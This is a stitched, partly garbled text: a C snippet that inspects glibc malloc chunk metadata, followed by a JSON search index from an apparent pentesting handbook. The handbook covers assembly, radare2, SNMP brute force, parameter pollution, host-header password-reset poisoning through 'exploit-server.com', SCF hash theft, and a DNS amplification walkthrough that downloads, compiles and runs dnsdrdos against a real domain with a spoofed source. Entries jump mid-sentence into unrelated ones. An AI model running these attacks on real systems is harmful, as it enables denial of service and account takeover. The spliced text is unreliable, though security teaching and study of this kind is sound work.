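    return *(const size_t *)((const char *)user_ptr - sizeof(size_t));
}

static size_t chunk_size(const void *user_ptr) {
    return raw_size_field(user_ptr) & ~(size_t)SIZE_BITS;
}

static unsigned chunk_flags(const void *user_ptr) {
    return (unsigned)(raw_size_field(user_ptr) & SIZE_BITS);
}

/* Allocate `req` bytes and report the chunk size the allocator actually used. */
size_t chunk_size_for_request(size_t req) {
    void *p = malloc(req);
    size_t s = chunk_size(p);
    free(p);
    return s;
}

/* Flag bits of a fresh allocation; in the main thread the A bit stays clear. */
unsigned flags_for_request(size_t req) {
    void *p = malloc(req);
    unsigned f = chunk_flags(p);
    free(p);
    return f;
}

/* Whether a request of `req` bytes is served off-heap via mmap (M bit set). */
int request_is_mmapped(size_t req) {
#ifdef __GLIBC__
    /* Pin the threshold: glibc raises it after an mmap-ed chunk is freed. */
    mallopt(M_MMAP_THRESHOLD, 128 * 1024);
#endif
    void *p = malloc(req);
    int m = (chunk_flags(p) & IS_MMAPPED) != 0;
    free(p);
    return m;
}

/* Freed tcache (or fastbin) chunks are handed back most-recently-freed first. */
int freed_chunks_reused_lifo(void) {
    char *a = malloc(24);
    char *b = malloc(24);
    free(a);
    free(b);
    char *c = malloc(24);   /* expect b, the last chunk freed */
    char *d = malloc(24);   /* expect a */
    int ok = (c == b) && (d == a);
    free(c);
    free(d);
    return ok;
}

int main(void) {
    void *p = malloc(24);
    unsigned f = chunk_flags(p);
    printf("malloc(24): chunk size %zu, flags 0x%x (P=%d M=%d A=%d)\n",
           chunk_size(p), f, !!(f & PREV_INUSE), !!(f & IS_MMAPPED),
           !!(f & NON_MAIN_ARENA));
    free(p);
    printf("malloc(25) -> chunk size %zu\n", chunk_size_for_request(25));
    printf("malloc(1 MiB) served via mmap: %d\n", request_is_mmapped(1 << 20));
    printf("freed chunks reused LIFO: %d\n", freed_chunks_reused_lifo());
    return 0;
}
```

Reading metadata this way is exactly what heap exploitation primitives rely on, so the same offsets show where an overflow of one byte past a buffer lands: the low flag bits and size of the next chunk.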
Note, you cannot access the lower 16 or 8 bits of the instruction pointer. You might sometimes see WORD or DWORD being used in a similar context - on x86 a WORD is 2 bytes, a DWORD is 4 bytes and a QWORD is 8 bytes.","breadcrumbs":"Reverse Engineering » Program Anatomy » Registers » Registers","id":"303","title":"Registers"},"304":{"body":"Under x64 Linux, function arguments are passed via registers: rdi: First Argument\nrsi: Second Argument\nrdx: Third Argument\nrcx: Fourth Argument\nr8: Fifth Argument\nr9: Sixth Argument The return value is stored in rax (eax on 32-bit machines, where the arguments are instead pushed onto the stack).","breadcrumbs":"Reverse Engineering » Program Anatomy » Registers » Register Use in x64 Linux","id":"304","title":"Register Use in x64 Linux"},"305":{"body":"Register dereferencing occurs when the value of the register is treated as an address of the actual data to be used, rather than the data itself. This means that addresses can be stored in registers and used later - this is useful when dealing with large data sizes. For example, mov rax, [rdx] will take the value inside rdx and treat it as an address - it will go to the location where this address points and get its data from there. It will then move this data into rax. If we hadn't used [], it would have treated the address in rdx simply as a value and moved it directly into rax.","breadcrumbs":"Reverse Engineering » Program Anatomy » Registers » Register Dereferencing","id":"305","title":"Register Dereferencing"},"306":{"body":"Ghidra is an open-source framework for reverse engineering developed by the NSA. 
It groups binaries into projects which can be shared amongst multiple people.","breadcrumbs":"Reverse Engineering » Reverse Engineering with Ghidra » Introduction","id":"306","title":"Introduction"},"307":{"body":"To install Ghidra on Kali or another Debian-based distribution, you can run sudo apt install ghidra.","breadcrumbs":"Reverse Engineering » Reverse Engineering with Ghidra » Installation","id":"307","title":"Installation"},"308":{"body":"File -> New Project, choose Non-Shared Project, select a directory and name the project.","breadcrumbs":"Reverse Engineering » Reverse Engineering with Ghidra » Creating a Project and Loading a Binary » Creating a Project","id":"308","title":"Creating a Project"},"309":{"body":"File -> Import File, then select the binary you want to import. Ghidra will automatically detect certain information about the file. After importing, Ghidra will display an Import Results Summary containing information about the binary.","breadcrumbs":"Reverse Engineering » Reverse Engineering with Ghidra » Creating a Project and Loading a Binary » Loading a Binary","id":"309","title":"Loading a Binary"},"31":{"body":"You will need working knowledge of SNMP in order to follow through.","breadcrumbs":"Reconnaissance » Enumeration » SNMP Enumeration (161) » Introduction","id":"31","title":"Introduction"},"310":{"body":"Double-clicking on a program will open it in the Code Browser. A prompt will appear for analysing the binary. Ghidra will attempt to create and label functions, as well as identify any cross-references in memory. Once the binary has been analysed you will be presented with the following screen:","breadcrumbs":"Reverse Engineering » Reverse Engineering with Ghidra » Initial Analysis » Initial Analysis","id":"310","title":"Initial Analysis"},"311":{"body":"radare2 is an open-source framework for reverse engineering. The framework includes multiple tools which all work in tandem in order to aid in the analysis of binary files. 
It uses short abbreviations for its commands - single letters - and many of its commands have subcommands which are also expressed as single letters. Luckily, you can always append a ? to a specific command in order to view its subcommands and what they do. To quit radare2, use the q command.","breadcrumbs":"Reverse Engineering » Reverse Engineering with radare2 » Introduction","id":"311","title":"Introduction"},"312":{"body":"You can load a binary by invoking the r2 command: r2 <binary>. You might sometimes need to also add the -e io.cache=true option in order to fix relocations in disassembly.","breadcrumbs":"Reverse Engineering » Reverse Engineering with radare2 » Loading a Binary","id":"312","title":"Loading a Binary"},"313":{"body":"aaa - analyse the binary afl - list the analysed functions axt <flag> - list all the places where a function is called (cross-references to it). Note, you need to use the flag name that radare2 automatically creates for functions after aaa.","breadcrumbs":"Reverse Engineering » Reverse Engineering with radare2 » Analysis » Analysis","id":"313","title":"Analysis"},"314":{"body":"/ <string> - search the bytes of the binary for a specific string /w <string> - search for wide character strings like Unicode symbols","breadcrumbs":"Reverse Engineering » Reverse Engineering with radare2 » Strings » Strings","id":"314","title":"Strings"},"315":{"body":"i - display file information ie - find the program's entry point iM - find the program's main function iz - pull the hard-coded strings from the executable (only the data sections), use izz to get the strings from the entire binary","breadcrumbs":"Reverse Engineering » Reverse Engineering with radare2 » Binary Info » Binary Info","id":"315","title":"Binary Info"},"316":{"body":"Flags resemble bookmarks. They associate a name with a given offset in a file. 
Create a new flag: f <name> @ <offset>. You can also remove a flag by appending - to the command: f-<name>. List available flags: f. Rename a flag: fr <old name> <new name>.","breadcrumbs":"Reverse Engineering » Reverse Engineering with radare2 » Flags » Flags","id":"316","title":"Flags"},"317":{"body":"Flag names should be unique for addressing reasons. However, it is often the case that you need to have simple and ubiquitous names like loop or return. For this purpose there exist the so-called \"local\" flags, which are tied to the function where they reside. It is possible to add them using the f. command:","breadcrumbs":"Reverse Engineering » Reverse Engineering with radare2 » Flags » Local Flags","id":"317","title":"Local Flags"},"318":{"body":"Flags can be grouped into flag spaces - a flag space is a namespace for flags, grouping together similar flags. Some flag spaces include sections, registers, symbols. These are managed with the fs command. [0x00001080]> fs?\nUsage: fs [*] [+-][flagspace|addr] # Manage flagspaces\n| fs display flagspaces\n| fs* display flagspaces as r2 commands\n| fsj display flagspaces in JSON\n| fs * select all flagspaces\n| fs flagspace select flagspace or create if it doesn't exist\n| fs-flagspace remove flagspace\n| fs-* remove all flagspaces\n| fs+foo push previous flagspace and set\n| fs- pop to the previous flagspace\n| fs-. remove the current flagspace\n| fsq list flagspaces in quiet mode\n| fsm [addr] move flags at given address to the current flagspace\n| fss display flagspaces stack\n| fss* display flagspaces stack in r2 commands\n| fssj display flagspaces stack in JSON\n| fsr newname rename selected flagspace","breadcrumbs":"Reverse Engineering » Reverse Engineering with radare2 » Flags » Flag Spaces","id":"318","title":"Flag Spaces"},"319":{"body":"Moving around the file requires the usage of the seek (s) command in order to change the offset at which we are. 
It takes one argument, which is a mathematical expression that may contain flag names, parentheses, addition, subtraction and multiplication of immediates, as well as the contents of memory using brackets. Examples: [0x00000000]> s 0x10\n[0x00000010]> s+4\n[0x00000014]> s-\n[0x00000010]> s+\n[0x00000014]> Here is a list of additional seeking commands: [0x00000000]> s?\nUsage: s # Help for the seek commands. See ?$? to see all variables\n| s Print current address\n| s.hexoff Seek honoring a base from core->offset\n| s:pad Print current address with N padded zeros (defaults to 8)\n| s addr Seek to address\n| s- Undo seek\n| s-* Reset undo seek history\n| s- n Seek n bytes backward\n| s--[n] Seek blocksize bytes backward (/=n)\n| s+ Redo seek\n| s+ n Seek n bytes forward\n| s++[n] Seek blocksize bytes forward (/=n)\n| s[j*=!] List undo seek history (JSON, =list, *r2, !=names, s==)\n| s/ DATA Search for next occurrence of 'DATA'\n| s/x 9091 Search for next occurrence of \\x90\\x91\n| sa [[+-]a] [asz] Seek asz (or bsize) aligned to addr\n| sb Seek aligned to bb start\n| sC[?] string Seek to comment matching given string\n| sf Seek to next function (f->addr+f->size)\n| sf function Seek to address of specified function\n| sf. Seek to the beginning of current function\n| sg/sG Seek begin (sg) or end (sG) of section or file\n| sl[?] [+-]line Seek to line\n| sn/sp ([nkey]) Seek to next/prev location, as specified by scr.nkey\n| so [N] Seek to N next opcode(s)\n| sr pc Seek to register\n| ss Seek silently (without adding an entry to the seek history) > 3s++ ; 3 times block-seeking\n> s 10+0x80 ; seek at 0x80+10","breadcrumbs":"Reverse Engineering » Reverse Engineering with radare2 » Seeking » Seeking","id":"319","title":"Seeking"},"32":{"body":"snmp-check is a simple utility for basic SNMP enumeration. You only need to provide it with the IP address to enumerate: snmp-check [IP] Furthermore, you have the following command-line options: -p: Change the port to enumerate. Default is 161. 
-c: Change the community string to use. Default is public -v: Change the SNMP version to use. Default is v1. There are additional arguments that can be provided but these are the salient ones.","breadcrumbs":"Reconnaissance » Enumeration » SNMP Enumeration (161) » SNMP Enumeration using snmp-check","id":"32","title":"SNMP Enumeration using snmp-check"},"320":{"body":"","breadcrumbs":"Reverse Engineering » Assembly Programming » Introduction","id":"320","title":"Introduction"},"321":{"body":"","breadcrumbs":"Reverse Engineering » Assembly Programming » x86-64 » Introduction","id":"321","title":"Introduction"},"322":{"body":"Variables in assembly do not exist in the same sense as they do in higher-level programming languages. This is especially true of local variables such as those inside functions. Instead of allocating space for a particular value and having that place be \"named\" according to a variable, the compiler may use a combination of stack and heap allocations as well as registers to achieve behaviour resembling a variable. That being said, there are some parallels with higher-level programming languages as well. When manually programming assembly, it should be noted that a variable name is essentially a label for an address.","breadcrumbs":"Reverse Engineering » Assembly Programming » x86-64 » Variables » Introduction","id":"322","title":"Introduction"},"323":{"body":"Assembly constants cannot be changed during run-time execution. Their value is substituted at assembly-time (corresponding to compile-time substitution for constants in higher-level languages). Consequently, constants are not even assigned a location in memory, for they turn into hard-coded values. 
Defining constants in assembly is done in the following way: <name> equ <value> For example, EXAMPLE equ 0xdeadbeef","breadcrumbs":"Reverse Engineering » Assembly Programming » x86-64 » Variables » Constants","id":"323","title":"Constants"},"324":{"body":"Static or global variables which are initialised before the programme executes are stored in the .data section. In order to define such a variable, you must give it a name, data size and value. In contrast with constants, such data can be mutated during run-time. The following data size declarations can be used: db (8 bits), dw (16 bits), dd (32 bits), dq (64 bits) and ddq (128 bits) for integers, and dt (80 bits, ten bytes) for extended-precision floating-point values. The syntax for declaring such variables is as follows: <name> <declaration> <value> For example: byteVar db 0x1A ; byte variable","breadcrumbs":"Reverse Engineering » Assembly Programming » x86-64 » Variables » Static Initialised Data","id":"324","title":"Static Initialised Data"},"325":{"body":"Static uninitialised data is stored in the .bss section. The syntax for allocating such variables is the following: <name> <declaration> <count> Such variables are usually allocated as chunks, hence the required count. The primary data types are as follows: resb (8 bits), resw (16 bits), resd (32 bits), resq (64 bits) and resdq (128 bits). Some examples: bArr resb 10 ; 10 element byte array wArr resw 50 ; 50 element word array dArr resd 100 ; 100 element double array qArr resq 200 ; 200 element quad array","breadcrumbs":"Reverse Engineering » Assembly Programming » x86-64 » Variables » Static Uninitialised Data","id":"325","title":"Static Uninitialised Data"},"326":{"body":"Data representation refers to the way that values are stored in a computer. For technical reasons, computers do not use the familiar base-10 number system but rather avail themselves of the base-2 (binary) system. 
Under this paradigm, numbers are represented as 1's and 0's.","breadcrumbs":"Reverse Engineering » Assembly Programming » x86-64 » Data Representation » Introduction","id":"326","title":"Introduction"},"327":{"body":"When storing an integer value, there are two ways to represent it - signed and unsigned - depending on whether the value should be entirely non-negative or may also have a \"-\" sign. Based on the number of bits used for storing a value, the value may have a different range. Byte (8 bits): 2^8 values, unsigned [0..255], signed [−128..+127]. Word (16 bits): 2^16 values, unsigned [0..65,535], signed [−32,768..+32,767]. Doubleword (32 bits): 2^32 values, unsigned [0..4,294,967,295], signed [−2,147,483,648..+2,147,483,647]. Quadword (64 bits): 2^64 values, unsigned [0..2^64−1], signed [−2^63..+2^63−1]. Double Quadword (128 bits): 2^128 values, unsigned [0..2^128−1], signed [−2^127..+2^127−1]. Unsigned integers are represented in their typical binary form.","breadcrumbs":"Reverse Engineering » Assembly Programming » x86-64 » Data Representation » Integer Representation","id":"327","title":"Integer Representation"},"328":{"body":"Signed integers are represented using two's complement. In order to acquire the negative of a number in two's complement, invert all of its bits and add 1 to the result. A corollary of this representation is that it adds no complexity to the addition and subtraction operations, since the same circuitry works for signed and unsigned values.","breadcrumbs":"Reverse Engineering » Assembly Programming » x86-64 » Data Representation » Two's Complement","id":"328","title":"Two's Complement"},"329":{"body":"Addressing modes refer to the supported methods for accessing and manipulating data. There are three basic addressing modes in x86-64: register, immediate and memory.","breadcrumbs":"Reverse Engineering » Assembly Programming » x86-64 » Addressing Modes » Introduction","id":"329","title":"Introduction"},"33":{"body":"snmpwalk is a much more versatile tool for SNMP enumeration. 
Its syntax is mostly the same as snmp-check:","breadcrumbs":"Reconnaissance » Enumeration » SNMP Enumeration (161) » SNMP Enumeration using snmpwalk","id":"33","title":"SNMP Enumeration using snmpwalk"},"330":{"body":"In register mode addressing, the operand is a register. mov rax, rbx The value inside rbx is copied to rax.","breadcrumbs":"Reverse Engineering » Assembly Programming » x86-64 » Addressing Modes » Register Mode Addressing","id":"330","title":"Register Mode Addressing"},"331":{"body":"In immediate mode addressing, the operand is an immediate value, or a literal . These are simply constant values such as 10, 0xfa3, \"lol\", and so on. mov rax, 123 The number 123 is copied into rax.","breadcrumbs":"Reverse Engineering » Assembly Programming » x86-64 » Addressing Modes » Immediate Mode Addressing","id":"331","title":"Immediate Mode Addressing"},"332":{"body":"In memory mode addressing, the operand is treated as a memory location. This is referred to as indirection or dereferencing and is similar to how pointers can be dereferenced in C/C++. In assembly, this is done by wrapping the operand in square brackets: []. So for example, rax refers to the value stored within the register rax. However, [rax] means \"treat rax like a pointer and use the value it points to\". Essentially, [rax] treats the value inside the register as an address and uses that address to find the actual value it needs. mov DWORD PTR [rax], 0xdeadbeef The value 0xdeadbeef is copied into the location pointed to by rax. Since memory is byte-addressable, it is oftentimes required to specify how many bytes we want to access. This is done by prepending one of the following specifiers to the operand: BYTE PTR / byte (1 byte), WORD PTR / word (2 bytes), DWORD PTR / dword (4 bytes), QWORD PTR / qword (8 bytes). Moreover, the actual formula for memory addressing is a bit more complicated, since it was developed mainly for making the implementation of arrays easier. 
[baseAddr + (indexReg * scaleValue) + offset] The baseAddr must be a register or variable name, although it may be omitted, in which case the address is relative to the beginning of the data segment. indexReg is a register which contains an index into the array and scaleValue is the size (in bytes) of a single member of the array; the hardware only allows scale values of 1, 2, 4 or 8. The offset must be an immediate value. mov eax, dword [ebx] ; move into eax the value which ebx points to\nmov rax, QWORD PTR [rbx + rsi] ; move into rax the value which (rbx + rsi) points to\nmov rcx, qword [rax+(rsi*8)] ; move into rcx the value which (rax + (rsi*8)) points to","breadcrumbs":"Reverse Engineering » Assembly Programming » x86-64 » Addressing Modes » Memory Mode Addressing","id":"332","title":"Memory Mode Addressing"},"333":{"body":"Memory is nothing more than a series of bytes which can be individually addressed. When storing values which are larger than a single byte, the bytes under the x86-64 paradigm are stored in little-endian order - the least significant byte (LSB) at the lowest memory address and the most significant byte (MSB) at the highest memory address. For example, the variable var = 0xDEADBEEF would be represented in memory as the byte sequence EF BE AD DE at increasing addresses. Note how the right-most byte of the written value is at the lowest address and the addresses for the rest of the bytes increase as we go right-to-left through the value.","breadcrumbs":"Reverse Engineering » Assembly Programming » x86-64 » Memory » Endianness","id":"333","title":"Endianness"},"334":{"body":"Below is the general memory layout of a programme: The reserved section is unavailable to user programmes. The .text section stores the instructions which comprise the programme's code. Static variables which were declared and given a value at assemble-time are stored in the .data section. The .bss section stores static uninitialised data, i.e. variables which were declared but were not provided with an initial value. 
If such variables are used before they are initialised, their value will be meaningless. The Stack and the Heap are where data can be allocated at run-time. The Stack is used for allocating space for small amounts of data with a size known at compile-time and grows from higher to lower addresses. Conversely, the Heap allows for the dynamic allocation of space for data of size known at run-time and grows from lower to higher addresses.","breadcrumbs":"Reverse Engineering » Assembly Programming » x86-64 » Memory » Memory Layout","id":"334","title":"Memory Layout"},"335":{"body":"Registers are value containers which reside on the CPU (separately from RAM). They are small in size and some have special purposes. x86-64 assembly operates with 16 general-purpose registers (GPRs). It should be noted that the 8-byte (r) variants do not exist in 32-bit mode. 64-bit Register Lower 4 Bytes Lower 2 Bytes Lower 1 Byte rbp ebp bp bpl rsp esp sp spl rip eip rax eax ax al rbx ebx bx bl rcx ecx cx cl rdx edx dx dl rsi esi si sil rdi edi di dil r8 r8d r8w r8b r9 r9d r9w r9b r10 r10d r10w r10b r11 r11d r11w r11b r12 r12d r12w r12b r13 r13d r13w r13b r14 r14d r14w r14b r15 r15d r15w r15b Each row contains names which refer to different parts of the same register. Note, the lower 16 bits of the rip register (instruction pointer) are inaccessible on their own. For example, the rax register could be set to the following: rax = 0x0000 00AB 10CA 07F0 The name eax would then only refer to the part of the rax register which contains 10CA 07F0. Similarly, ax would represent 07F0, and al would be just F0. Additionally, the upper byte of ax, bx, cx and dx may be separately accessed by means of the ah, bh, ch and dh monikers, which exist for legacy reasons.","breadcrumbs":"Reverse Engineering » Assembly Programming » x86-64 » Registers » Introduction","id":"335","title":"Introduction"},"336":{"body":"Not all registers available in the x86-64 paradigm are created equal. 
Certain registers are reserved for specific purposes, despite being called general-purpose.","breadcrumbs":"Reverse Engineering » Assembly Programming » x86-64 » Registers » Register Specialisation","id":"336","title":"Register Specialisation"},"337":{"body":"The stack pointer rsp (esp for 32-bit machines) is used to point to the current top of the stack and should not be used for any other purpose other than in instructions which involve stack manipulation.","breadcrumbs":"Reverse Engineering » Assembly Programming » x86-64 » Registers » The Stack Pointer rsp","id":"337","title":"The Stack Pointer rsp"},"338":{"body":"The base pointer rbp (ebp for 32-bit machines) is the twin brother of the stack pointer and is used as a base pointer when calling functions. It points to the beginning of the current function's stack frame. Interestingly enough, its use is actually gratuitous because compilers can manage the stack frames of functions equally well without a separate base pointer. It is mostly used to make assembly code more comprehensible for humans.","breadcrumbs":"Reverse Engineering » Assembly Programming » x86-64 » Registers » The Base Pointer rbp","id":"338","title":"The Base Pointer rbp"},"339":{"body":"The instruction pointer rip (eip for 32-bit machines) points to the next instruction to be executed. It is paramount not to get confused when using a debugger, since the rip does not actually point to the instruction currently being executed.","breadcrumbs":"Reverse Engineering » Assembly Programming » x86-64 » Registers » The Instruction Pointer rip","id":"339","title":"The Instruction Pointer rip"},"34":{"body":"Notwithstanding its age, onesixtyone is a good tool which allows you to bruteforce community strings by specifying a file instead of a single string with its -c option. 
Its syntax is rather simple:","breadcrumbs":"Reconnaissance » Enumeration » SNMP Enumeration (161) » Bruteforce community strings with onesixtyone","id":"34","title":"Bruteforce community strings with onesixtyone"},"340":{"body":"The flag register rFlags (eFlags for 32-bit machines) is an isolated register which is automatically updated by the CPU after every instruction and is not directly accessible by programmes. Following is a table of the meaning assigned to different bits of this register. Note that only the lower 32 bits are used even on 64-bit machines. Name Symbol Bit Usage =1 =0 Carry CF 0 Indicates whether the previous operation resulted in a carry-over. CY (Carry) CN (No Carry) 1 Reserved. Always set to 1 for eFlags. Parity PF 2 Indicates whether the least significant byte of the previous instruction's result has an even number of 1's. PE (Parity Even) PO (Parity Odd) 3 Reserved. Auxiliary Carry AF 4 Used to support binary-coded decimal operations. AC (Auxiliary Carry) NA (No Auxiliary Carry) 5 Reserved. Zero ZF 6 Indicates whether the previous operation resulted in a zero. ZR (Zero) NZ (Not Zero) Sign SF 7 Indicates whether the most significant bit was set to 1 in the previous operation (implies a negative result in signed-data contexts). NG (Negative) PL (Positive) Trap TF 8 Used by debuggers when single-stepping through a programme. Interrupt Enable IF 9 Indicates whether or not the CPU should immediately respond to maskable hardware interrupts. EI (Enable Interrupt) DI (Disable Interrupt) Direction DF 10 Indicates the direction in which several bytes of data should be copied from one location to another. DN (Down) UP (Up) Overflow OF 11 Indicates whether the previous operation resulted in an integer overflow. 
OV (Overflow) NV (No Overflow) I/O Privilege Level IOPL 12-13 Nested Task NT 14 Mode MD 15 Resume RF 16 Virtual 8086 Mode VM 17 31-63 Reserved.","breadcrumbs":"Reverse Engineering » Assembly Programming » x86-64 » Registers » The Flag Register rFlags","id":"340","title":"The Flag Register rFlags"},"341":{"body":"In addition to the aforementioned registers, the x86-64 paradigm includes 16 registers, xmm[0-15], which are used for 32- and 64-bit floating-point operations. Furthermore, the same registers are used to support the Streaming SIMD Extensions (SSE) which allow for the execution of Single Instruction Multiple Data (SIMD) instructions.","breadcrumbs":"Reverse Engineering » Assembly Programming » x86-64 » Registers » Floating-Point Registers and SSE","id":"341","title":"Floating-Point Registers and SSE"},"342":{"body":"The x86-64 assembly paradigm has quite a lot of different instructions available at its disposal. An instruction consists of an operation and a set of operands where the latter specify the data and the former specifies what is to be done to that data.","breadcrumbs":"Reverse Engineering » Assembly Programming » x86-64 » Instruction Set » Introduction","id":"342","title":"Introduction"},"343":{"body":"Typically, instruction signatures are represented using the following operand notation. Operand Notation Description Register operand. , , , Register operand with a specific size requirement. Source operand. Destination operand - this may be a register or memory location. Floating-point destination register operand. Immediate value (a literal). Base-10 by default, but can be preceded with 0x to make it hexadecimal. Memory location - a variable name or an address. Arbitrary operand - immediate value, register or memory location. .'\">View Me! Here, a new URL is generated based on the value of a parameter $val. Now, the attacker passes the value 123%26action=edit onto the parameter. The URL-encoded value for & is %26. 
When this gets to the htmlspecialchars function, the %26 gets converted to an &. When the URL gets formed, it becomes And since this is viewed as HTML, an additional parameter has been smuggled! The link would be equivalent to /page.php?action=view&par=123&action=edit This second action parameter could cause unexpected behaviour based on how the server handles duplicate requests.","breadcrumbs":"Exploitation » Web » HTTP Parameter Pollution » Client-Side HPP","id":"147","title":"Client-Side HPP"},"148":{"body":"The HTTP Host header is a mandatory header for HTTP requests and specifies the domain name which the client wants to access. This is especially handy with virtual hosting because a single IP address may provide different services on different domains and the server needs to know which page to return to the client. For example, the same machine may serve a blog website at blog.example.com and a git repository at dev.example.com. In order to specify which of the two services the client wants to access, they must specify either the header Host: blog.example.com or dev.example.com, respectively, in their request. A host header injection vulnerability arises when the target application unsafely uses the contents of the Host header, typically in order to construct an absolute URL.","breadcrumbs":"Exploitation » Web » Host Header Injection » Introduction","id":"148","title":"Introduction"},"149":{"body":"This technique involves using Host Header Injection in order to force a vulnerable application to generate a password reset link which points to a malicious domain. This may be leveraged to steal the secret tokens required to reset the passwords of arbitrary users and consequently compromise their accounts. Typically applications implement password resetting as follows. The user specifies their username/email. The server generates a temporary, unique, high-entropy token for the user. 
The server generates a URL for the password reset with the secret token included as a URL parameter. For example, example.com/reset?token=abcdefghijklmnopqrstuvwxyz The server sends an email to the client which includes the generated password reset link. When the user clicks the link in their email, the token in the URL is used by the server in order to determine whose password is being reset and whether or not it is a valid request. If the Host header of the request for a password reset is used in generating the password reset URL, an adversary may leverage it in order to steal the token for an arbitrary user. For example, an adversary could submit a password reset request for a user, e.g. carlos, intercept the request and modify the Host header to point to a domain controlled by them: Host: exploit-server.com. When the server generates the password reset URL, it will resemble the following, http://exploit-server.com/reset?token=abcdefghijklmnopqrstuvwxyz. If the victim clicks on the link, their token will be handed over to the attacker by means of the exploit-server.com domain which receives the password reset request. This type of attack, however, does not always require user interaction because emails are typically scanned, be it to determine whether they are spam or whether they contain a virus, and the scanners will oftentimes open the links themselves, all automatically, thus giving the attacker the token to reset the password.","breadcrumbs":"Exploitation » Web » Host Header Injection » Password Reset Poisoning","id":"149","title":"Password Reset Poisoning"},"15":{"body":"This is the process of discovering active hosts on a network, either for attacking them or assessing the overall network security.","breadcrumbs":"Reconnaissance » Enumeration » Network Scanning","id":"15","title":"Network Scanning"},"150":{"body":"Check to see if absolute URLs are necessary and cannot be replaced with relative ones. 
If an absolute URL is necessary, ensure that the current domain is stored in a configuration file and do NOT use the one from the Host: header. If using the Host header is inevitable, ensure that it is validated against a whitelist of permitted domains. Different frameworks may provide different methods for achieving this. Drop support for additional headers which may permit such attacks, such as the X-Forwarded-Host header. Do NOT virtual-host internal-only websites on a server which also provides public-facing content, since those may be accessed via manipulation of the Host header.","breadcrumbs":"Exploitation » Web » Host Header Injection » Prevention","id":"150","title":"Prevention"},"151":{"body":"","breadcrumbs":"Exploitation » Windows » Windows","id":"151","title":"Windows"},"152":{"body":"Shell Command Files (SCF) permit a limited set of operations and are executed upon browsing to the location where they are stored. What makes them interesting is the fact that they can communicate through SMB, which means that it is possible to extract NTLM hashes from Windows hosts. This can be achieved if you are provided with write access to an SMB share.","breadcrumbs":"Exploitation » Windows » SCF File Attacks » Introduction","id":"152","title":"Introduction"},"153":{"body":"You will first need to create a malicious .scf file where you are going to write a simple (you can scarcely even call it that) script.","breadcrumbs":"Exploitation » Windows » SCF File Attacks » The Attack","id":"153","title":"The Attack"},"154":{"body":"","breadcrumbs":"Exploitation » DNS » DNS","id":"154","title":"DNS"},"155":{"body":"A DNS (Traffic) Amplification attack is a popular form of a distributed denial of service (DDoS) attack, which abuses open DNS resolvers to flood a target system with DNS response traffic. 
It's called an amplification attack because it uses DNS responses to upscale the size of the data sent to the victim.","breadcrumbs":"Exploitation » DNS » DNS Traffic Amplification » What is DNS Traffic Amplification?","id":"155","title":"What is DNS Traffic Amplification?"},"156":{"body":"An attacker sends a DNS name lookup to an open resolver with the source IP spoofed to be the victim's IP address. That way, any response traffic would be sent to the victim and not the attacker. The requests submitted by the attacker usually aim to query for as much information as possible in order to maximise the amplification effect. In most cases, the queries sent are of type ANY which requests all known information about a particular DNS zone. Using a botnet, it's easy to create immense amounts of traffic. It is also rather difficult to protect against these attacks because the traffic is coming from legitimate sources - real DNS servers.","breadcrumbs":"Exploitation » DNS » DNS Traffic Amplification » How does it work?","id":"156","title":"How does it work?"},"157":{"body":"","breadcrumbs":"Exploitation » DNS » DNS Traffic Amplification » Conducting a DNS Traffic Amplification Attack","id":"157","title":"Conducting a DNS Traffic Amplification Attack"},"158":{"body":"We should first check if a DNS Traffic Amplification is possible and if it's viable. We can do this through Metasploit using the module auxiliary/scanner/dns/dns_amp. In the RHOSTS you need to put the IP of the name server you want to test. This module will tell you if a name server can be used in an amplification attack but won't actually execute the attack. Run the scanner:","breadcrumbs":"Exploitation » DNS » DNS Traffic Amplification » Testing a DNS server for attack surface","id":"158","title":"Testing a DNS server for attack surface"},"159":{"body":"A simple tool is available only as a proof of concept here . 
You will need to download and then compile it: wget https://raw.githubusercontent.com/rodarima/lsi/master/entrega/p2/dnsdrdos.c gcc -o dnsdrdos dnsdrdos.c -Wall -ansi ┌──(cr0mll@kali)-[~/MHN/DNS]-[]\n└─$ wget https://raw.githubusercontent.com/rodarima/lsi/master/entrega/p2/dnsdrdos.c\n--2021-09-21 13:01:11-- https://raw.githubusercontent.com/rodarima/lsi/master/entrega/p2/dnsdrdos.c\nResolving raw.githubusercontent.com (raw.githubusercontent.com)... 185.199.109.133, 185.199.111.133, 185.199.110.133, ...\nConnecting to raw.githubusercontent.com (raw.githubusercontent.com)|185.199.109.133|:443... connected.\nHTTP request sent, awaiting response... 200 OK\nLength: 15109 (15K) [text/plain]\nSaving to: ‘dnsdrdos.c’ dnsdrdos.c 100%[========================================================================================================================================>] 14.75K --.-KB/s in 0.001s 2021-09-21 13:01:11 (17.9 MB/s) - ‘dnsdrdos.c’ saved [15109/15109] ┌──(cr0mll@kali)-[~/MHN/DNS]-[]\n└─$ gcc -o dnsdrdos dnsdrdos.c -Wall -ansi Now, create a file containing the IPs of each DNS server you want to use in the attack (only one IP per line). Use the following syntax to run the attack: sudo ./dnsdrdos -f -s -d -l ┌──(cr0mll@kali)-[~/MHN/DNS]-[]\n└─$ sudo ./dnsdrdos -f dns_servers -s 192.168.129.2 -d nsa.gov -l 30\n----------------------------------------------- dnsdrdos - by noptrix - http://www.noptrix.net/ ----------------------------------------------- ┌──(cr0mll@kali)-[~/MHN/DNS]-[]\n└─$ The output may be empty, but the packets were sent. You can verify this with wireshark:","breadcrumbs":"Exploitation » DNS » DNS Traffic Amplification » Executing the attack","id":"159","title":"Executing the attack"},"16":{"body":"Reveals the presence of known vulnerabilities. It checks whether a system is exploitable through a set of weaknesses. Such a scanner consists of a catalog and a scanning engine. 
The catalog contains information about known vulnerabilities and exploits for them that work on a multitude of servers. The scanning engine is responsible for the logic behind the exploitation and analysis of the results.","breadcrumbs":"Reconnaissance » Enumeration » Vulnerability Scanning","id":"16","title":"Vulnerability Scanning"},"160":{"body":"A flaw of all DNS name servers is that if they contain incorrect information, they may spread it to clients or other name servers. Each DNS name server (even individual clients) has a DNS cache. The system stores there information about any responses it gets for domains it requested. An attacker could inject false entries in this cache and as such, any computer which queries the poisoned name server will receive false results. This is known as DNS cache poisoning . The attack can be used to redirect users to a different website than the requested one. As such, it opens opportunities for phishing attacks by creating evil twins of login portals for well-known sites. A tool for performing such targeted attacks is deserter . Usage information is available on its GitHub page.","breadcrumbs":"Exploitation » DNS » DNS Cache Poisoning » Introduction","id":"160","title":"Introduction"},"161":{"body":"","breadcrumbs":"Post Exploitation » Post Exploitation","id":"161","title":"Post Exploitation"},"162":{"body":"","breadcrumbs":"Post Exploitation » Privilege Escalation » Introduction","id":"162","title":"Introduction"},"163":{"body":"The first thing you need to do after gaining a foothold on a machine is to look for 